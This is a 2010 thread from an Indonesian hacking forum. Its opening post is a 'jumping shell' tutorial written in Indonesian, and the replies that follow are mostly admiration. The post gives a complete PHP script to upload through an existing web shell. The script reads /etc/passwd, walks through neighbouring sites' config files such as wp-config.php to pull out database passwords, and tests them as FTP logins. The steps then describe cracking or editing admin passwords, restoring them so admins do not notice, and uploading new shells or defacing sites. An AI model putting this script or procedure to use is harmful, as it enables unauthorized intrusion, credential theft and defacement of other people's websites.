Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

The largest cyber security forum in Indonesia with more than 129000 members
http://xcode.or.id/forum/

[TUTORIAL] Simple Jumping Shell

http://xcode.or.id/forum/viewtopic.php?f=99&t=39110

Page 1 of 2

[TUTORIAL] Simple Jumping Shell

Posted: Sat May 15, 2010 10:26 am
by juara1
Hehehe Mav Pertama Kali Sharing Tutorial, kalo uda ngerti mav ya ,, sharing aja
Ni sistemnya cm scanning Dir website yang satu hosting dengan shell yang kita punya ( ga semuanya shell berhasil )
biasanya kalo open read /etc/passwd terbuka seperti dibawah kadang bisa discan

Code: Select all

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
1. siapkan shell yang kamu punya
Image

2. upload scan.php
Image

Code: Select all

    <?php
    echo "<html>";
    echo "<title>JU4RA | CYBER Forum Yogyafree Keren Yach</title><body>";

    set_time_limit(0);
    ##################
    @$passwd=fopen('/etc/passwd','r');
    if (!$passwd) {
    echo "[-] Error : coudn't read /etc/passwd";
    exit;
    }
    $path_to_public=array();
    $users=array();
    $pathtoconf=array();
    $i=0;

    while(!feof($passwd)) {
    $str=fgets($passwd);
    if ($i>35) {
    $pos=strpos($str,":");
    $username=substr($str,0,$pos);
    $dirz="/home/$username/public_html/";
    if (($username!="")) {
    if (is_readable($dirz)) {
    array_push($users,$username);
    array_push($path_to_public,$dirz);
    }
    }
    }
    $i++;
    }
    ###################

    #########################
    echo "<br><br>";
    echo "<textarea name='main_window' cols=100 rows=20>";

    echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
    echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories\n";

    echo "[~] Searching for passwords in config.* files...\n\n";
    foreach ($users as $user) {
    $path="/home/$user/public_html/";
    read_dir($path,$user);
    }

    echo "\n[+] Done\n";

    function read_dir($path,$username) {
    if ($handle = opendir($path)) {
    while (false !== ($file = readdir($handle))) {
    $fpath="$path$file";
    if (($file!='.') and ($file!='..')) {
    if (is_readable($fpath)) {
    $dr="$fpath/";
    if (is_dir($dr)) {
    read_dir($dr,$username);
    }
    else {
    if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='configuration.php') or ($file=='db_connect.php')) {
    $pass=get_pass($fpath);
    if ($pass!='') {
    echo "[+] $fpath\n$pass\n";
    ftp_check($username,$pass);
    }
    }
    }
    }
    }
    }
    }
    }

    function get_pass($link) {
    @$config=fopen($link,'r');
    while(!feof($config)) {
    $line=fgets($config);
    if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) {
    if (strrpos($line,'"'))
    $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3)));
    else
    $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3)));
    return $pass;
    }
    }
    }

    function ftp_check($login,$pass) {
    @$ftp=ftp_connect('127.0.0.1');
    if ($ftp) {
    @$res=ftp_login($ftp,$login,$pass);
    if ($res) {
    echo '[FTP] '.$login.':'.$pass."  Success\n";
    }
    else ftp_quit($ftp);
    }
    }

    echo "</textarea><br>";

    echo "</body></html>";
    ?>
3. Buka file scan.php msl: http://targer.com/scan.php
tunggu beberapa saat, emang agak lama
Image

4. Buka shell kamu copykan hasil scannan tadi ke change dir shell kamu ato masukkan dir config ke read file
Image

5. Setelah dapat login Sql dbnya ,, crack dah passwordnya ,, kalo ga bisa di crack edit aja ,,
asal jangan lupa ntar dikembalikan kesemula ,, biar admin ga tau ,,

6. Setelah itu login di admin page webnya

7. upload dah shell baru ,, ato deface ,,

mav kalo kurang jelas ato repost ,,
Thankz for All :circle:

Re: [TUTORIAL] Simple Jumping Shell

Posted: Sat May 15, 2010 2:43 pm
by Digital Cat
wow..

mantep gan..

hebat kamu ini..

paten.. paten..

Re: [TUTORIAL] Simple Jumping Shell

Posted: Sat May 15, 2010 6:33 pm
by indounderground
salut2
wes ngge tutorial saiki
kalah rek aku

Re: [TUTORIAL] Simple Jumping Shell

Posted: Sat May 15, 2010 7:18 pm
by shad.hckr
akhirnya mas juara mengeluarkan jurus mautnya.. :love: :love: :love:
tengkyuh ya pak.. :kaca: :kaca: :kaca: :kaca:

Re: [TUTORIAL] Simple Jumping Shell

Posted: Sun May 16, 2010 7:16 am
by juara1
indounderground wrote:salut2
wes ngge tutorial saiki
kalah rek aku
wadu master indo ,, sam ,, aq pgn nang ngen e sampean ,, ntar lek mau kesana tak sms ,,
hehhe iseng2 ae sam ,, timbang nganggur ,,, :usap:

Re: [TUTORIAL] Simple Jumping Shell

Posted: Sun May 16, 2010 9:57 pm
by dark_superman
:cry: :cry: wowow

jumping shell ya mantab deh kaka keren :ngakak:

Re: [TUTORIAL] Simple Jumping Shell

Posted: Mon May 17, 2010 9:23 pm
by Neo-Gabriel
Wow, berb0b0t :D ijin mempelajari bro

Re: [TUTORIAL] Simple Jumping Shell

Posted: Mon May 17, 2010 10:19 pm
by ecko
Weiiiiiih....mantap kk tutor nya....
:ngakak: :ngakak: :ngakak:

Re: [TUTORIAL] Simple Jumping Shell

Posted: Mon May 17, 2010 10:41 pm
by aries deris
wew hebat kk
ajarin kk :D

Re: [TUTORIAL] Simple Jumping Shell

Posted: Tue May 18, 2010 7:22 am
by juara1
aries deris wrote:wew hebat kk
ajarin kk :D
walah kk deris ,, wwkkw ,, ris ,, ayo golek JD ,, klunting2 ,, ngelak aq ,, wkwkw
:malumalu: :malumalu: :malumalu:
All times are UTC+07:00
Page 1 of 2
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/